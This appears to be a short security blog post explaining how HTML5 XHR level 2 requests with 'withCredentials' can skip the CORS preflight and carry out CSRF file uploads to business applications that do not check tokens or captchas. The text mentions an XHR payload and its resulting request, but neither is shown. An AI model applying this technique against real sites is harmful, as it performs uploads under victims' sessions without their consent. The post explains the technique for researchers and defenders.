XHR level 2 calls embedded in HTML5 browser can open a cross
domain socket and deliver HTTP request. Cross Domain call needs to abide by
CORS. Browser will generate preflight requests to check policy and based on
that will allow cookie replay. Interestingly, multi-part/form-data request will
go through without preflight check and “withCredentials” allows cookie replay.
This can be exploited to upload business logic files via CSRF if server is not
validating token/captcha. Business applications are allowing to upload files
like orders, invoices, imports, contacts etc. These critical functionalities can
be exploited in the case of poor programming.
If we have a business functionalities for actual upload form
then this type of HTTP request will get generated at the time of upload. Note, cookie is being replayed and request is multi-part form.
Now, if CSRF payload has following XHR call.
Above call will generate following HTTP request and causes CSRF and upload the file. Hence, without user’s conscent or knowledge cross
domain file being uploaded on the target application with the logged in credential.
Future probes – one needs to check other impact like AMF
stream uploading, XML file transfer and few other library protocols which is
now a day’s dealing in multi-part to support binary calls.
If you are interested in this analysis should visit @kkotowicz work - http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html.